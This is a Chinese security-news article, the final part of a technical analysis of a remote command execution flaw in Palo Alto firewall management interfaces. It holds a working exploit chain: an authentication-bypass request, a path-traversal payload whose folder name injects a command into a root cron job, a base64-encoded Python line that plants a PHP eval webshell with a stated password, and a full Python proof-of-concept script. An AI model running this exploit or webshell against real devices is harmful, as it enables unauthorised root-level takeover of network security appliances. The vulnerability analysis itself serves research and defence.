欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

PaloAlto远程命令执行漏洞关键技术分析终篇

来源:本站整理 作者:佚名 时间:2018-03-08 TAG: 我要投稿

4、PanDirect->execute($params)的逻辑如下:
1)checkValidRemoteCall对类、方法、是否为静态方法进行判定;
2)$obj = $reflection->newInstanceArgs(array($jsonArgs));建立Administrator类;
3)$obj->$method();调用Administrator类的get方法

5、Administrator.get方法调用Direct::getConfigByXpath()函数,形成的xml如下图:
  

6、最终通过MSCommection.php中的writeaPayload函数将xml字符串发送给后台进程mgmtsrvr
7、mgmtsrvr中的pan_mgmtsrvr_client_svc函数接收的数据如下。/tmp/hacked’/>之后,有个0字节,形成数据截断

8、最终在libpanmp_mp.so.1中的pan_jobmgr_store_job_result函数中利用路径回溯,建立了/tmp/hacked文件夹

(三)命令执行
1、查看/etc/cron.d/目录下的文件,此目录下存放的是系统级任务的任务文件。下面有个indexgen文件,会在0、15、30、45分钟的时候执行genindex_batch.sh脚本:
SHELL=/bin/bash
0,15,30,45 * * * * root /usr/local/bin/genindex_batch.sh
在genindex_batch.sh中调用了/usr/local/bin/genindex.sh脚本
2、genindex.sh中造成命令执行的关键代码如下,其中PAN_BASE_DIR=/opt/pancfg/mgmt

3、命令执行
1)利用文件夹创建漏洞,发送
{"action":"PanDirect","method":"execute","data":["07c5807d0d927dcd0980f86024e5208b","Administrator.get",{"changeMyPassword":true,"template":"asd","id":"admin']\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvdnVkcmMucGhwJywgJ3cnKTtmLndyaXRlKCI8P3BocCBAZXZhbCgkX1BPU1RbJ2NodnVjMDEwJ10pOz8+Iik7Zi5jbG9zZSgpOw==\".decode(\"base64\")) ;'/>\u0000"}],"type":"rpc","tid":713}
2)创建文件夹/opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(“Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvdnVkcmMucGhwJywgJ3cnKTtmLndyaXRlKCI8P3BocCBAZXZhbCgkX1BPU1RbJ2NodnVjMDEwJ10pOz8+Iik7Zi5jbG9zZSgpOw==”.decode(“base64″)) ;,其中base64编码数据解码之后的数值为f=open(‘/var/appweb/htdocs/vudrc.php’, ‘w’);f.write(“”);f.close();
3)genindex.sh执行的时候,执行的`find $day -mmin +5 -name pan.*.log | sort -r` 成为`find /opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(“Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvdnVkcmMucGhwJywgJ3cnKTtmLndyaXRlKCI8P3BocCBAZXZhbCgkX1BPU1RbJ2NodnVjMDEwJ10pOz8+Iik7Zi5jbG9zZSgpOw==”.decode(“base64″)) ; -mmin +5 -name pan.*.log | sort -r`,形成命令注入。
4)最多15分钟后,在/var/appweb/htdocs/vudrc.php写入一句话木马,密码为chvuc010
(四)poc
import urllibimport urllib2import ssl  import sysssl._create_default_https_context = ssl._create_unverified_context domain = "192.168.1.1"#pass authprint "step 1: pass_auth"pass_auth_url = "https://" + domain + "/esp/cms_changeDeviceContext.esp?device=1024:bbbb'\";user|s:"print "pass_auth request:    " + pass_auth_urlrequest = urllib2.Request(pass_auth_url)response = urllib2.urlopen(request)print "pass_auth respone:    " + response.read()session_start_index = response.headers['Set-Cookie'].find("PHPSESSID")if session_start_index == -1:    print "pass_auth fail!!"    sys.exit()session = response.headers['Set-Cookie'][session_start_index:]session = session[:session.find(';')]auth_headers = { 'Cookie':session, 'Connection':'keep-alive'}print "\n"print "step 2: check if pass auth"auth_url = "https://" + domain + "/php/utils/debug.php"print "auth_url request:    " + auth_urlrequest = urllib2.Request(auth_url, headers = auth_headers)response = urllib2.urlopen(request)content = response.read()#print contentif "Debug" not in content:    print "pass auth fail!!"    sys.exit()print "pass auth success!!"print "\n"print "setp 3: create dir"create_dir_url = "https://" + domain + "/php/utils/router.php/Administrator.get"print "create_dir request:    " + create_dir_urlpost_data = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../opt/pancfg/mgmt/logdb/traffic/1/* -print -exec python -c exec(\\\"Zj1vcGVuKCcvdmFyL2FwcHdlYi9odGRvY3MvdnVkcmMucGhwJywgJ3cnKTtmLndyaXRlKCI8P3BocCBAZXZhbCgkX1BPU1RbJ2NodnVjMDEwJ10pOz8+Iik7Zi5jbG9zZSgpOw==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"request = urllib2.Request(create_dir_url, headers = auth_headers, data=post_data)response = urllib2.urlopen(request)print "\n"print "15 minutes later, visit https://" + domain + "/vudrc.php"
 

上一页  [1] [2] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载